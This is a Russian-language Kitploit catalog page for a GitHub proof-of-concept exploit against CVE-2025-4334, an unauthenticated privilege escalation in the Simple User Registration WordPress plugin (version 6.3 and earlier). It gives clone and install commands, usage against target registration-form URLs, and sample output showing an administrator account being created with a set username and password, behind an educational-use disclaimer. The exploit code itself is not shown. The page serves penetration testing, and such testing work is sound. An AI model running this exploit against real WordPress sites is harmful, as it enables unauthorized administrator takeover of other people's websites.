Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4334 — Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts. | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.

Репозиторий
410 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Логотип WordPress

CVE-2025-4334 - Simple User Registration <= 6.3 Неаутентифицированное повышение привилегий

Название эксплойта: Simple User Registration <= 6.3 – Неаутентифицированное повышение привилегий Автор: Gaurav Bhattacharjee (0xgh057r3c0n) CVE ID: CVE-2025-4334

Этот эксплойт нацелен на уязвимость в плагине Simple User Registration для WordPress (<= v6.3), позволяющую неаутентифицированным атакующим повысить привилегии и создать новую учетную запись администратора.


⚙️ Установка

Клонируйте репозиторий и установите необходимые зависимости Python:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Зависимости:

  • requests
  • colorama

🚀 Использование

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Аргументы:

  • -u / --url → Базовый URL WordPress (например, https://target.com/wordpress/)
  • --form → Полный URL формы регистрации (например, https://target.com/wpr/default-registration/)

Пример:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Пример вывода

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных и исследовательских целей. Несанкционированное использование против систем без разрешения противозаконно. Автор не несет ответственности за неправомерное использование.


📄 Лицензия

Этот проект лицензирован под MIT License.

Скачать инструмент